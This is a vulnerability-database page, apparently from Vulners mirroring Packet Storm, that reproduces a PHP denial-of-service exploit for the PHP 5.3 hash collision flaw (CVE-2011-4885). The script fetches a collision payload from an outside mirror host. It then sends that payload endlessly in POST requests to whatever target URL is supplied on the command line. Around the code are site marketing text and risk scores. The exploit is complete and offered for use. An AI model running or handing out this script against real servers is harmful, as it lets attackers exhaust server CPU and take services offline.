Lucene search
K

PHP 5.3.x Hashtables Proof Of Concept

🗓️ 01 Jan 2012 00:00:00Reported by infodoxType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 123 Views

PHP 5.3.x Hashtables DoS Exploit by infodox with CVE-2011-488

Related
Code
`<?php  
/*  
PHP 5.3.* Hash Colission DoS Exploit by infodox  
Original version by itz me (opensc.ws)  
CVE-2011-4885  
  
Mirrors List:  
http://compsoc.nuigalway.ie/~infodox/hashcollide.txt  
http://jrs-s.net/hashcollide.txt  
http://www.infodox.co.cc/Downloads/hashcollide.txt  
  
Changes:  
Different mirror for hashcollide.txt  
Now takes target as a command line argument  
Status message printing  
  
Twitter: @info_dox  
Blog: blog.infodox.co.cc  
Site: http://www.infodox.co.cc/  
*/  
$targ = $argv[1];  
$x = file_get_contents("http://jrs-s.net/hashcollide.txt"); // if this doesnt work replace with the mirrors_lst ones...  
while(1) {  
echo "firing";  
$ch = curl_init("$targ");  
curl_setopt($ch, CURLOPT_POSTFIELDS, $x);  
curl_exec($ch);  
curl_close($ch);  
echo "[+] Voly Sent!";  
}  
?>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jan 2012 00:00Current
9.6High risk
Vulners AI Score9.6
EPSS0.86573
123